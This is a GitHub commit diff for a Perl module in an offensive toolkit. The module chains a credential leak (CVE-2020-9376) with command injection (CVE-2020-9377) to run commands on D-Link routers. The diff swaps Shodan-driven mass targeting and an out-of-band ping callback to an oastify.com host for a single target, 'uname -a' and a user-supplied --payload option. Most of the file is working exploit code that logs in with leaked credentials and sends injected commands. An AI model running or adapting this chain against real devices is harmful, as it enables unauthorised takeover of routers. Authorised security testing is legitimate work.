Skip to content

Commit

Permalink
fixes and more flexibility
Browse files Browse the repository at this point in the history
  • Loading branch information
@htrgouvea
htrgouvea committed Jun 16, 2024
1 parent e3dad4d commit 3e654b0
Showing 1 changed file with 39 additions and 42 deletions.
81 changes: 39 additions & 42 deletions lib/Spellbook/Exploit/Fullchain_DLINK.pm
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,66 +4,62 @@ package Spellbook::Exploit::Fullchain_DLINK {
use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;
use Spellbook::Recon::Shodan;
use Spellbook::Recon::Query_Shodan;
use Spellbook::Advisory::CVE_2020_9376;
use Spellbook::Advisory::CVE_2020_9377;

sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);
my ($help, $target, $payload, @results);

Getopt::Long::GetOptionsFromArray (
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
"h|help" => \$help,
"t|target=s" => \$target,
"p|payload=s" => \$payload
);

if ($target) {
my @targets = Spellbook::Recon::Shodan -> new (["--target" => 1]);

foreach my $router (@targets) {
my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $router]);
if ($target !~ /^http(s)?:\/\//x) {
$target = "http://$target";
}

if ($credentials) {
my ($username, $password) = split /:/, $credentials;
my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]);

if (!$password) { $password = "admin"; }
if ($credentials) {
my ($username, $password) = split /:/, $credentials;

if ($username) {
if ($router !~ /^http(s)?:\/\//x) {
$router = "http://$router";
}
if (!$password) {
$password = "admin";
}

my $userAgent = LWP::UserAgent->new();
my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
if ($username) {
my $userAgent = LWP::UserAgent->new();
my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";

my $headers = HTTP::Headers->new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=dLktm5OJdn",
"User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
"Accept" => "*/*",
"Accept-Language" => "en-US,en;q=0.5",
"Accept-Encoding" => "gzip, deflate",
"Origin" => "$router",
"Referer" => "$router/",
"Connection" => "keep-alive"
);
my $headers = HTTP::Headers->new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=zwUEueUOvi",
"User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", "Accept" => "*/*",
"Accept-Language" => "en-US,en;q=0.5",
"Accept-Encoding" => "gzip, deflate",
"Origin" => $target,
"Referer" => $target,
"Connection" => "keep-alive"
);

my $request = HTTP::Request -> new("POST", "$router/session.cgi", $headers, $payload);
my $response = $userAgent -> request($request);
my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload);
my $response = $userAgent -> request($request);

if ($response -> is_success) {
my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
"--target" => $router,
"--cookie" => "dLktm5OJdn",
"--payload" => "ping h4mm16zegmqhsuhuatu0j6ged5jw7nvc.oastify.com"
]);
if ($response -> is_success) {
my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
"--target" => $target,
"--cookie" => "zwUEueUOvi",
"--payload" => "uname -a"
]);

if ($exploit[0] ne "Authenication fail") {
print "$router => $username / $password / dLktm5OJdn\n";

push @results, @exploit;
}
if ($exploit[0] ne "Authenication fail") {
push @results, @exploit;
}
}
}
Expand All @@ -77,7 +73,8 @@ package Spellbook::Exploit::Fullchain_DLINK {
\rExploit::Fullchain_DLINK
\r=======================
\r-h, --help See this menu
\r-t, --target Define a target\n\n";
\r-t, --target Define a target
\r-p, --payload Send a command\n\n";
}

return 0;
Expand Down

0 comments on commit 3e654b0

Please sign in to comment.